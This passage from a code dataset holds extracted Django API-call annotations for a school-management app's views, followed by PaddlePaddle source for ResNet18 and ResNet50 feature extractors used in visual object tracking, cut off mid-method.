'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((335, 1, 335, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(335, 18, 335, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((344, 1, 344, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((345, 1, 345, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(345, 18, 345, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((354, 1, 354, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((355, 1, 355, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(355, 18, 355, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((378, 1, 378, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((379, 1, 379, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(379, 18, 379, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, 
user_passes_test\n'), ((385, 1, 385, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((386, 1, 386, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(386, 18, 386, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((394, 1, 394, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((395, 1, 395, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(395, 18, 395, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((406, 1, 406, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((407, 1, 407, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(407, 18, 407, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((412, 1, 412, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((413, 1, 413, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(413, 18, 413, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((437, 1, 437, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((438, 1, 438, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(438, 18, 438, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((462, 1, 462, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((463, 1, 463, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(463, 18, 463, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((468, 1, 468, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((469, 1, 469, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(469, 18, 469, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((482, 1, 482, 39), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((483, 1, 483, 27), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(483, 18, 483, 26): 'is_admin'}, {}), '(is_admin)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((503, 1, 503, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), 
((504, 1, 504, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(504, 18, 504, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((518, 1, 518, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((519, 1, 519, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(519, 18, 519, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((524, 1, 524, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((525, 1, 525, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(525, 18, 525, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((548, 1, 548, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((549, 1, 549, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(549, 18, 549, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((566, 1, 566, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((567, 1, 567, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(567, 18, 567, 28): 'is_teacher'}, {}), '(is_teacher)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((588, 1, 588, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((589, 1, 589, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(589, 18, 589, 28): 'is_student'}, {}), '(is_student)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((603, 1, 603, 41), 'django.contrib.auth.decorators.login_required', 'login_required', (), '', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((604, 1, 604, 29), 'django.contrib.auth.decorators.user_passes_test', 'user_passes_test', ({(604, 18, 604, 28): 'is_student'}, {}), '(is_student)', False, 'from django.contrib.auth.decorators import login_required, user_passes_test\n'), ((11, 11, 11, 46), 'django.shortcuts.render', 'render', ({(11, 18, 11, 25): 'request', (11, 26, 11, 45): '"""school/index.html"""'}, {}), "(request, 'school/index.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((19, 11, 19, 51), 'django.shortcuts.render', 'render', ({(19, 18, 19, 25): 'request', (19, 26, 19, 50): '"""school/adminclick.html"""'}, {}), "(request, 'school/adminclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((26, 11, 26, 53), 'django.shortcuts.render', 'render', ({(26, 18, 26, 25): 'request', (26, 26, 26, 52): '"""school/teacherclick.html"""'}, {}), "(request, 'school/teacherclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((33, 11, 33, 53), 
'django.shortcuts.render', 'render', ({(33, 18, 33, 25): 'request', (33, 26, 33, 52): '"""school/studentclick.html"""'}, {}), "(request, 'school/studentclick.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((53, 11, 53, 66), 'django.shortcuts.render', 'render', ({(53, 18, 53, 25): 'request', (53, 26, 53, 51): '"""school/adminsignup.html"""', (53, 52, 53, 65): "{'form': form}"}, {}), "(request, 'school/adminsignup.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((77, 11, 77, 69), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((99, 11, 99, 69), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((171, 11, 171, 71), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((184, 11, 184, 54), 'django.shortcuts.render', 'render', ({(184, 18, 184, 25): 'request', (184, 26, 184, 53): '"""school/admin_teacher.html"""'}, {}), "(request, 'school/admin_teacher.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((209, 11, 209, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((216, 11, 216, 81), 'django.shortcuts.render', 'render', ({(216, 18, 216, 25): 'request', (216, 26, 216, 58): '"""school/admin_view_teacher.html"""', (216, 59, 216, 80): "{'teachers': teachers}"}, {}), "(request, 'school/admin_view_teacher.html', {'teachers': teachers})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((223, 11, 223, 84), 'django.shortcuts.render', 'render', ({(223, 18, 223, 25): 'request', (223, 26, 223, 61): '"""school/admin_approve_teacher.html"""', (223, 62, 223, 83): "{'teachers': teachers}"}, {}), "(request, 'school/admin_approve_teacher.html', {'teachers': teachers})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((242, 11, 242, 44), 'django.shortcuts.redirect', 'redirect', ({(242, 20, 242, 43): '"""admin-approve-teacher"""'}, {}), "('admin-approve-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((252, 11, 252, 41), 'django.shortcuts.redirect', 'redirect', ({(252, 20, 252, 40): '"""admin-view-teacher"""'}, {}), "('admin-view-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((277, 11, 277, 76), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((284, 11, 284, 88), 'django.shortcuts.render', 'render', ({(284, 18, 284, 25): 'request', (284, 26, 284, 65): '"""school/admin_view_teacher_salary.html"""', (284, 66, 284, 87): "{'teachers': teachers}"}, {}), "(request, 'school/admin_view_teacher_salary.html', {'teachers': teachers}\n )", False, 'from django.shortcuts import render, redirect, reverse\n'), ((296, 11, 296, 54), 'django.shortcuts.render', 'render', ({(296, 18, 296, 25): 'request', (296, 26, 296, 53): '"""school/admin_student.html"""'}, {}), "(request, 'school/admin_student.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((324, 11, 324, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((331, 11, 331, 81), 'django.shortcuts.render', 'render', ({(331, 18, 331, 25): 'request', (331, 26, 331, 58): '"""school/admin_view_student.html"""', (331, 59, 331, 80): "{'students': students}"}, {}), 
"(request, 'school/admin_view_student.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((341, 11, 341, 41), 'django.shortcuts.redirect', 'redirect', ({(341, 20, 341, 40): '"""admin-view-student"""'}, {}), "('admin-view-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((351, 11, 351, 44), 'django.shortcuts.redirect', 'redirect', ({(351, 20, 351, 43): '"""admin-approve-student"""'}, {}), "('admin-approve-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((374, 11, 374, 76), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((382, 11, 382, 84), 'django.shortcuts.render', 'render', ({(382, 18, 382, 25): 'request', (382, 26, 382, 61): '"""school/admin_approve_student.html"""', (382, 62, 382, 83): "{'students': students}"}, {}), "(request, 'school/admin_approve_student.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((398, 11, 398, 85), 'django.shortcuts.render', 'render', ({(398, 18, 398, 25): 'request', (398, 26, 398, 62): '"""school/admin_view_student_fee.html"""', (398, 63, 398, 84): "{'students': students}"}, {}), "(request, 'school/admin_view_student_fee.html', {'students': students})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((409, 11, 409, 57), 'django.shortcuts.render', 'render', ({(409, 18, 409, 25): 'request', (409, 26, 409, 56): '"""school/admin_attendance.html"""'}, {}), "(request, 'school/admin_attendance.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((433, 11, 433, 98), 'django.shortcuts.render', 'render', ({(433, 18, 433, 25): 'request', (433, 26, 433, 61): '"""school/admin_take_attendance.html"""', (433, 62, 433, 97): "{'students': students, 'aform': aform}"}, {}), "(request, 'school/admin_take_attendance.html', {'students': students,\n 'aform': aform})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((451, 11, 451, 93), 'django.shortcuts.render', 'render', ({(451, 18, 451, 25): 'request', (451, 26, 451, 70): '"""school/admin_view_attendance_ask_date.html"""', (451, 71, 451, 92): "{'cl': cl, 'form': form}"}, {}), "(request, 'school/admin_view_attendance_ask_date.html', {'cl': cl,\n 'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((465, 11, 465, 50), 'django.shortcuts.render', 'render', ({(465, 18, 465, 25): 'request', (465, 26, 465, 49): '"""school/admin_fee.html"""'}, {}), "(request, 'school/admin_fee.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((472, 11, 472, 89), 'django.shortcuts.render', 'render', ({(472, 18, 472, 25): 'request', (472, 26, 472, 54): '"""school/admin_view_fee.html"""', (472, 55, 472, 88): "{'feedetails': feedetails, 'cl': cl}"}, {}), "(request, 'school/admin_view_fee.html', {'feedetails': feedetails,\n 'cl': cl})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((493, 11, 493, 67), 'django.shortcuts.render', 'render', ({(493, 18, 493, 25): 'request', (493, 26, 493, 52): '"""school/admin_notice.html"""', (493, 53, 493, 66): "{'form': form}"}, {}), "(request, 'school/admin_notice.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((514, 11, 514, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((521, 11, 521, 59), 'django.shortcuts.render', 'render', ({(521, 
18, 521, 25): 'request', (521, 26, 521, 58): '"""school/teacher_attendance.html"""'}, {}), "(request, 'school/teacher_attendance.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((544, 11, 544, 100), 'django.shortcuts.render', 'render', ({(544, 18, 544, 25): 'request', (544, 26, 544, 63): '"""school/teacher_take_attendance.html"""', (544, 64, 544, 99): "{'students': students, 'aform': aform}"}, {}), "(request, 'school/teacher_take_attendance.html', {'students':\n students, 'aform': aform})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((562, 11, 562, 95), 'django.shortcuts.render', 'render', ({(562, 18, 562, 25): 'request', (562, 26, 562, 72): '"""school/teacher_view_attendance_ask_date.html"""', (562, 73, 562, 94): "{'cl': cl, 'form': form}"}, {}), "(request, 'school/teacher_view_attendance_ask_date.html', {'cl': cl,\n 'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((579, 11, 579, 69), 'django.shortcuts.render', 'render', ({(579, 18, 579, 25): 'request', (579, 26, 579, 54): '"""school/teacher_notice.html"""', (579, 55, 579, 68): "{'form': form}"}, {}), "(request, 'school/teacher_notice.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((599, 11, 599, 73), 'django.shortcuts.render', 'render', (), '', False, 'from django.shortcuts import render, redirect, reverse\n'), ((617, 11, 617, 87), 'django.shortcuts.render', 'render', ({(617, 18, 617, 25): 'request', (617, 26, 617, 72): '"""school/student_view_attendance_ask_date.html"""', (617, 73, 617, 86): "{'form': form}"}, {}), "(request, 'school/student_view_attendance_ask_date.html', {'form': form})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((629, 11, 629, 48), 'django.shortcuts.render', 'render', ({(629, 18, 629, 25): 'request', (629, 26, 629, 47): '"""school/aboutus.html"""'}, {}), "(request, 'school/aboutus.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((641, 11, 641, 65), 'django.shortcuts.render', 'render', ({(641, 18, 641, 25): 'request', (641, 27, 641, 50): '"""school/contactus.html"""', (641, 52, 641, 64): "{'form': sub}"}, {}), "(request, 'school/contactus.html', {'form': sub})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((10, 15, 10, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(10, 36, 10, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((18, 15, 18, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(18, 36, 18, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((25, 15, 25, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(25, 36, 25, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((32, 15, 32, 49), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(32, 36, 32, 48): '"""afterlogin"""'}, {}), "('afterlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((76, 15, 76, 51), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(76, 36, 76, 50): '"""studentlogin"""'}, {}), "('studentlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((98, 15, 98, 51), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(98, 36, 98, 50): '"""teacherlogin"""'}, {}), "('teacherlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((117, 
15, 117, 42), 'django.shortcuts.redirect', 'redirect', ({(117, 24, 117, 41): '"""admin-dashboard"""'}, {}), "('admin-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((145, 76, 145, 89), 'django.db.models.Sum', 'Sum', ({(145, 80, 145, 88): '"""salary"""'}, {}), "('salary')", False, 'from django.db.models import Sum\n'), ((146, 84, 146, 97), 'django.db.models.Sum', 'Sum', ({(146, 88, 146, 96): '"""salary"""'}, {}), "('salary')", False, 'from django.db.models import Sum\n'), ((148, 73, 148, 93), 'django.db.models.Sum', 'Sum', (), '', False, 'from django.db.models import Sum\n'), ((149, 81, 149, 91), 'django.db.models.Sum', 'Sum', ({(149, 85, 149, 90): '"""fee"""'}, {}), "('fee')", False, 'from django.db.models import Sum\n'), ((208, 15, 208, 52), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(208, 36, 208, 51): '"""admin-teacher"""'}, {}), "('admin-teacher')", False, 'from django.http import HttpResponseRedirect\n'), ((232, 20, 232, 52), 'django.shortcuts.reverse', 'reverse', ({(232, 28, 232, 51): '"""admin-approve-teacher"""'}, {}), "('admin-approve-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((323, 15, 323, 52), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(323, 36, 323, 51): '"""admin-student"""'}, {}), "('admin-student')", False, 'from django.http import HttpResponseRedirect\n'), ((391, 20, 391, 52), 'django.shortcuts.reverse', 'reverse', ({(391, 28, 391, 51): '"""admin-approve-student"""'}, {}), "('admin-approve-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((49, 29, 49, 70), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((52, 19, 52, 53), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', ({(52, 40, 52, 52): '"""adminlogin"""'}, {}), "('adminlogin')", False, 'from django.http import HttpResponseRedirect\n'), ((73, 31, 73, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((95, 31, 95, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((205, 31, 205, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((276, 19, 276, 49), 'django.shortcuts.redirect', 'redirect', ({(276, 28, 276, 48): '"""admin-view-teacher"""'}, {}), "('admin-view-teacher')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((319, 31, 319, 74), 'django.contrib.auth.models.Group.objects.get_or_create', 'Group.objects.get_or_create', (), '', False, 'from django.contrib.auth.models import Group\n'), ((373, 19, 373, 49), 'django.shortcuts.redirect', 'redirect', ({(373, 28, 373, 48): '"""admin-view-student"""'}, {}), "('admin-view-student')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((430, 19, 430, 47), 'django.shortcuts.redirect', 'redirect', ({(430, 28, 430, 46): '"""admin-attendance"""'}, {}), "('admin-attendance')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((448, 19, 448, 113), 'django.shortcuts.render', 'render', ({(448, 26, 448, 33): 'request', (448, 34, 448, 74): '"""school/admin_view_attendance_page.html"""', (448, 75, 448, 112): "{'cl': cl, 'mylist': mylist, 'date': 
date}"}, {}), "(request, 'school/admin_view_attendance_page.html', {'cl': cl,\n 'mylist': mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((492, 19, 492, 46), 'django.shortcuts.redirect', 'redirect', ({(492, 28, 492, 45): '"""admin-dashboard"""'}, {}), "('admin-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((541, 19, 541, 49), 'django.shortcuts.redirect', 'redirect', ({(541, 28, 541, 48): '"""teacher-attendance"""'}, {}), "('teacher-attendance')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((559, 19, 559, 115), 'django.shortcuts.render', 'render', ({(559, 26, 559, 33): 'request', (559, 34, 559, 76): '"""school/teacher_view_attendance_page.html"""', (559, 77, 559, 114): "{'cl': cl, 'mylist': mylist, 'date': date}"}, {}), "(request, 'school/teacher_view_attendance_page.html', {'cl': cl,\n 'mylist': mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((576, 19, 576, 48), 'django.shortcuts.redirect', 'redirect', ({(576, 28, 576, 47): '"""teacher-dashboard"""'}, {}), "('teacher-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((614, 19, 614, 107), 'django.shortcuts.render', 'render', ({(614, 26, 614, 33): 'request', (614, 34, 614, 76): '"""school/student_view_attendance_page.html"""', (614, 77, 614, 106): "{'mylist': mylist, 'date': date}"}, {}), "(request, 'school/student_view_attendance_page.html', {'mylist':\n mylist, 'date': date})", False, 'from django.shortcuts import render, redirect, reverse\n'), ((640, 19, 640, 66), 'django.shortcuts.render', 'render', ({(640, 26, 640, 33): 'request', (640, 35, 640, 65): '"""school/contactussuccess.html"""'}, {}), "(request, 'school/contactussuccess.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((121, 19, 121, 48), 'django.shortcuts.redirect', 'redirect', ({(121, 28, 121, 47): '"""teacher-dashboard"""'}, {}), "('teacher-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((123, 19, 123, 74), 'django.shortcuts.render', 'render', ({(123, 26, 123, 33): 'request', (123, 34, 123, 73): '"""school/teacher_wait_for_approval.html"""'}, {}), "(request, 'school/teacher_wait_for_approval.html')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((127, 19, 127, 48), 'django.shortcuts.redirect', 'redirect', ({(127, 28, 127, 47): '"""student-dashboard"""'}, {}), "('student-dashboard')", False, 'from django.shortcuts import render, redirect, reverse\n'), ((129, 19, 129, 74), 'django.shortcuts.render', 'render', ({(129, 26, 129, 33): 'request', (129, 34, 129, 73): '"""school/student_wait_for_approval.html"""'}, {}), "(request, 'school/student_wait_for_approval.html')", False, 'from django.shortcuts import render, redirect, reverse\n')]
weiwei1115/models
PaddleCV/tracking/pytracking/features/deep.py
e2c96c5f64b1dc8f0d5d9aa121300b87150e11e3
import os

import numpy as np
from paddle import fluid

from ltr.models.bbreg.atom import atom_resnet50, atom_resnet18
from ltr.models.siamese.siam import siamfc_alexnet
from ltr.models.siam.siam import SiamRPN_AlexNet, SiamMask_ResNet50_sharp, SiamMask_ResNet50_base
from pytracking.admin.environment import env_settings
from pytracking.features.featurebase import MultiFeatureBase
from pytracking.libs import TensorList
from pytracking.libs.paddle_utils import n2p


class ResNet18(MultiFeatureBase):
    """ResNet18 feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self,
                 output_layers=('block2', ),
                 net_path='atom_iou',
                 use_gpu=True,
                 *args,
                 **kwargs):
        super().__init__(*args, **kwargs)
        self.output_layers = list(output_layers)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = atom_resnet18(
                backbone_pretrained=False,
                backbone_is_test=True,
                iounet_is_test=True)

            state_dictsm, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dictsm)
            self.net.train()

            self.iou_predictor = self.net.bb_regressor

        self.layer_stride = {
            'conv0': 2,
            'conv1': 2,
            'block0': 4,
            'block1': 8,
            'block2': 16,
            'block3': 32,
            'classification': 16,
            'fc': None
        }
        self.layer_dim = {
            'conv0': 64,
            'conv1': 64,
            'block0': 64,
            'block1': 128,
            'block2': 256,
            'block3': 512,
            'classification': 256,
            'fc': None
        }

        self.iounet_feature_layers = self.net.bb_regressor_layer

        if isinstance(self.pool_stride, int) and self.pool_stride == 1:
            self.pool_stride = [1] * len(self.output_layers)

        self.feature_layers = sorted(
            list(set(self.output_layers + self.iounet_feature_layers)))

        self.mean = np.reshape([0.485, 0.456, 0.406], [1, -1, 1, 1])
        self.std = np.reshape([0.229, 0.224, 0.225], [1, -1, 1, 1])

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net
        if hasattr(self, 'iou_predictor'):
            del self.iou_predictor
        if hasattr(self, 'iounet_backbone_features'):
            del self.iounet_backbone_features
        if hasattr(self, 'iounet_features'):
            del self.iounet_features

    def dim(self):
        return TensorList([self.layer_dim[l] for l in self.output_layers])

    def stride(self):
        return TensorList([
            s * self.layer_stride[l]
            for l, s in zip(self.output_layers, self.pool_stride)
        ])

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = im / 255.  # don't use im /= 255. since we don't want to alter the input
            im -= self.mean
            im /= self.std
            im = n2p(im)

            output_features = self.net.extract_features(im, self.feature_layers)

            # Store the raw resnet features which are input to iounet
            iounet_backbone_features = TensorList([
                output_features[layer]
                for layer in self.iounet_feature_layers
            ])
            self.iounet_backbone_features = iounet_backbone_features.numpy()

            # Store the processed features from iounet, just before pooling
            self.iounet_features = TensorList([
                f.numpy() for f in self.iou_predictor.get_iou_feat(
                    iounet_backbone_features)
            ])

            output = TensorList([
                output_features[layer].numpy()
                for layer in self.output_layers
            ])
        return output


class ResNet50(MultiFeatureBase):
    """ResNet50 feature.
    args:
        output_layers: List of layers to output.
        net_path: Relative or absolute net path (default should be fine).
        use_gpu: Use GPU or CPU.
    """

    def __init__(self,
                 output_layers=('block2', ),
                 net_path='atom_iou',
                 use_gpu=True,
                 *args,
                 **kwargs):
        super().__init__(*args, **kwargs)
        self.output_layers = list(output_layers)
        self.use_gpu = use_gpu
        self.net_path = net_path

    def initialize(self):
        with fluid.dygraph.guard():
            if os.path.isabs(self.net_path):
                net_path_full = self.net_path
            else:
                net_path_full = os.path.join(env_settings().network_path,
                                             self.net_path)

            self.net = atom_resnet50(
                backbone_pretrained=False,
                backbone_is_test=True,
                iounet_is_test=True)

            state_dictsm, _ = fluid.load_dygraph(net_path_full)
            self.net.load_dict(state_dictsm)
            self.net.train()

            self.iou_predictor = self.net.bb_regressor

        self.layer_stride = {
            'conv0': 2,
            'conv1': 2,
            'block0': 4,
            'block1': 8,
            'block2': 16,
            'block3': 32,
            'classification': 16,
            'fc': None
        }
        self.layer_dim = {
            'conv0': 64,
            'conv1': 64,
            'block0': 256,
            'block1': 512,
            'block2': 1024,
            'block3': 2048,
            'classification': 256,
            'fc': None
        }

        self.iounet_feature_layers = self.net.bb_regressor_layer

        if isinstance(self.pool_stride, int) and self.pool_stride == 1:
            self.pool_stride = [1] * len(self.output_layers)

        self.feature_layers = sorted(
            list(set(self.output_layers + self.iounet_feature_layers)))

        self.mean = np.reshape([0.485, 0.456, 0.406], [1, -1, 1, 1])
        self.std = np.reshape([0.229, 0.224, 0.225], [1, -1, 1, 1])

    def free_memory(self):
        if hasattr(self, 'net'):
            del self.net
        if hasattr(self, 'iou_predictor'):
            del self.iou_predictor
        if hasattr(self, 'iounet_backbone_features'):
            del self.iounet_backbone_features
        if hasattr(self, 'iounet_features'):
            del self.iounet_features

    def dim(self):
        return TensorList([self.layer_dim[l] for l in self.output_layers])

    def stride(self):
        return TensorList([
            s * self.layer_stride[l]
            for l, s in zip(self.output_layers, self.pool_stride)
        ])

    def extract(self, im: np.ndarray, debug_save_name=None):
        with fluid.dygraph.guard():
            if debug_save_name is not None:
                np.savez(debug_save_name, im)

            im = im / 255.  # don't use im /= 255. since we don't want to alter the input
            im -= self.mean
            im /= self.std
            im = n2p(im)

            output_features = self.net.extract_features(im, self.feature_layers)

            # Store the raw resnet features which are input to iounet
            iounet_backbone_features = TensorList([
                output_features[layer]
                for layer in self.iounet_feature_layers
            ])
            self.iounet_backbone_features = iounet_backbone_features.numpy()

            # Store the processed features from iounet, just before pooling
            self.iounet_features = TensorList([
                f.numpy() for f in self.iou_predictor.get_iou_feat(
                    iounet_backbone_features)
            ])

            output = TensorList([
